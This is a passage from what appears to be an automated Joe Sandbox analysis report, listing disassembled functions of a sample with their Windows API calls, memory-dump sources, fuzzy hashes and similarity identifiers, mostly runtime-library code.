                                                                                                                                                                                                            • API String ID: 1719142349-2766056989
                                                                                                                                                                                                            • Opcode ID: 56331fcb0ea2561366f6386992856d3c974bae48db91adc24ab6ec6a832c896b
                                                                                                                                                                                                            • Instruction ID: e8742282f748774fe9456c2553bcff96d4da2bfcdf314a888be4ac4e0844307a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56331fcb0ea2561366f6386992856d3c974bae48db91adc24ab6ec6a832c896b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0218222B1AB4582EF45CB65E40032AA3A0FF89BD0F089130DB9D17B88EF3CD5618754
                                                                                                                                                                                                            Function 00007FF7ACEA86D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction ID: 6eed861bbc9385c8c604a1f76d53db9e29344388df0e9869ea69a43e9442c698
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C11B632D1DB836DF7787164D441375A8C06F553A6F8E4A31F56EAA2F6CE2CE4404120
                                                                                                                                                                                                            Function 00007FF7ACE9A790 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7AF
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7CE
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7F6
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A807
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A818
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: 9e804fd289b4b3ef91baa5930f6d3ebb166ce1e0dbc6b955ff6578ee9fb93aad
                                                                                                                                                                                                            • Instruction ID: cb41e2ee8a7fe4f1eb77544f7537645b50f246577fa4e5a27cd87d5f010f3c7b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e804fd289b4b3ef91baa5930f6d3ebb166ce1e0dbc6b955ff6578ee9fb93aad
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11AF30E0E20261FA68B325564A179E2515F407F0FCA4374F93D7A7F6EE2CE9528221
                                                                                                                                                                                                            Function 00007FF7ACE9A624 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A635
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A654
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A67C
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A68D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A69E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: abd555598871f52e6c51055266dbbfd9f3064b5a0b37023567c52a13d64941c3
                                                                                                                                                                                                            • Instruction ID: 9f731da7d92178f95e245f3231131b2a67597fa5e19b16218576d10d8473a4da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: abd555598871f52e6c51055266dbbfd9f3064b5a0b37023567c52a13d64941c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80110330A0F20361F968762545521B9E2924F45364F8B47B4FA3E7A3F7ED2CF9518231
                                                                                                                                                                                                            Function 00007FF8A7FF7F60 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Buffer_FreeMem_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2882253451-0
                                                                                                                                                                                                            • Opcode ID: 9197714d27a3d5d3aaa65365540c80f6dd243b107bfa15a838e82b0f74160cb6
                                                                                                                                                                                                            • Instruction ID: 1e71700a0c4a49e382e00c26f07494a0d74ed2acd8c54bc3b492d13274b41c6e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9197714d27a3d5d3aaa65365540c80f6dd243b107bfa15a838e82b0f74160cb6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20114622E1BA8292EB148F70D81437C6360FFA8B88F555235CA5D065A4DF7DE590C360
                                                                                                                                                                                                            Function 00007FF8A8003FD0 Relevance: 7.5, APIs: 5, Instructions: 28COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionDeleteEnterLeaveSleepVariablefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3510912472-0
                                                                                                                                                                                                            • Opcode ID: afc7edadd1e42cf4fe697bb83e6061dfea79ab44947196cf8f83d9c23c7477b5
                                                                                                                                                                                                            • Instruction ID: 4a4a0cc26d6047b35b3f560c74acea780c4e884cf78812b6da8509883cdcc7c0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: afc7edadd1e42cf4fe697bb83e6061dfea79ab44947196cf8f83d9c23c7477b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F03061A16E02A2EF649F21A8587342370FF55BD9F092230CD0E126D4CF3CD4E8C7A8
                                                                                                                                                                                                            Function 00007FF8A801D690 Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterVariableWake$Leave
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2469173835-0
                                                                                                                                                                                                            • Opcode ID: c4fdeb67b32b6322c659a54c97be5a6c3d35674daeaf6bb935b474feb099a17d
                                                                                                                                                                                                            • Instruction ID: 5c161d8f04587908bacc4874286ba15bfc0c6ad076e2f08b7c7a330a5affef65
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4fdeb67b32b6322c659a54c97be5a6c3d35674daeaf6bb935b474feb099a17d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF01DA32A06A86A7EB489F31E6846A9B360FB58794F054031C71D43251EF38A4B8CB94
                                                                                                                                                                                                            Function 00007FF8A7FFFA30 Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$Buffer_FreeMem_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1171622071-0
                                                                                                                                                                                                            • Opcode ID: 45a940d82dd7a3dc6d822b210ccf8ef6ed54f9ffecf5f21cc8988ed4339dda9f
                                                                                                                                                                                                            • Instruction ID: 2884234648bc9ba909320764911ed5ef28cd48543fa8b5394e1d4b693610eaee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a940d82dd7a3dc6d822b210ccf8ef6ed54f9ffecf5f21cc8988ed4339dda9f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E701E232D0BA06E6FB545FB0A41933C23A0FB54F89F095030CA0A056E0CFBC6699E366
                                                                                                                                                                                                            Function 00007FF8A801D970 Relevance: 7.5, APIs: 5, Instructions: 18COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize$ConditionCriticalSectionVariable$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2794081246-0
                                                                                                                                                                                                            • Opcode ID: e00864eff3d3d918f73b8efd480f65d64605ad4fcf517c2d3bad7aa52c7b0f91
                                                                                                                                                                                                            • Instruction ID: 9b7a6a4dbb436ac14310682f35354e1877bde21b23b9320049467e45e84e84a7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e00864eff3d3d918f73b8efd480f65d64605ad4fcf517c2d3bad7aa52c7b0f91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85E01A11A26C47A2EF10AF31D8482B82320FFA9B99F450031C50E861A1DE3C959E8394
                                                                                                                                                                                                            Function 00007FF7ACE9F0C8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                            • Opcode ID: 0a85a650483ad60012865602343b5a273e15b3a1a81ddf8674274c6c15df3bc7
                                                                                                                                                                                                            • Instruction ID: 434fca1db0eb8eeaa6e981a799befbc9359c9f9f4119d795746091887b6bd426
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a85a650483ad60012865602343b5a273e15b3a1a81ddf8674274c6c15df3bc7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1819676E0E243A5F764AF25C900378F7A0AB11744FD78071EA09B72A5CF3DE9429322
                                                                                                                                                                                                            Function 00007FF7ACE8E048 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                            • Opcode ID: b915d9317e93b4a578d272aa80a630b017422358f6ab493f0d79254b27da14c1
                                                                                                                                                                                                            • Instruction ID: 6a65ee44a84865148c44e79060329bdd7d422fbcd3010fb657a6a4db0ae13e0d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b915d9317e93b4a578d272aa80a630b017422358f6ab493f0d79254b27da14c1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22619937A09B85DAEB10EF65D1803ADB7A0FB44B89F454225EF5D27BA8CB38E144C710
                                                                                                                                                                                                            Function 00007FF7ACE824D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                                            • Opcode ID: 87d498f1f2eba1085113bd965dcd85bf0b0aec07eea02affa6468b175f4c1a2f
                                                                                                                                                                                                            • Instruction ID: 54688023df1a5c8ef5f65a9dd7e5409e1e8225a684c3e4c95d09336f0d3bad67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87d498f1f2eba1085113bd965dcd85bf0b0aec07eea02affa6468b175f4c1a2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D631617262E6C2A1E620F710E4517EAF3A4FB84785FC14035EA8D276A9DF3CD205CB50
                                                                                                                                                                                                            Function 00007FF8A7FFA840 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Format
                                                                                                                                                                                                            • String ID: could not load compression dictionary: %s$could not set compression parameters: %s
                                                                                                                                                                                                            • API String ID: 376477240-936281982
                                                                                                                                                                                                            • Opcode ID: ce38244f42f7a165e7c65ad904b6b64b07a159b1c15ad359841d4554f1228515
                                                                                                                                                                                                            • Instruction ID: a877a650cfc06965b2549b86330e7c9bb307fc474beb826e1ff0f41b3d2949ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce38244f42f7a165e7c65ad904b6b64b07a159b1c15ad359841d4554f1228515
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8218C66A1AB0291EE509F71E84026933A0FB49BF0F051332DE6D077D9DFB8E4A2D714
                                                                                                                                                                                                            Function 00007FF8A8188C70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • BrotliDecoderDecompressStream failed while finishing the stream, xrefs: 00007FF8A8188C9A
                                                                                                                                                                                                            • BrotliDecoderState is NULL while checking is_finished, xrefs: 00007FF8A8188C86
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: BrotliDecoderDecompressStream failed while finishing the stream$BrotliDecoderState is NULL while checking is_finished
                                                                                                                                                                                                            • API String ID: 1450464846-662759581
                                                                                                                                                                                                            • Opcode ID: 9007a02874a4bdb622f11420666ed0fca7fc5bec9a1caf3f370f90a38daeabf3
                                                                                                                                                                                                            • Instruction ID: 0b2de381a5bb33ea2b4413d8bfe5e2d165ad789e8e72f6aa4c53d2de5614f2f6
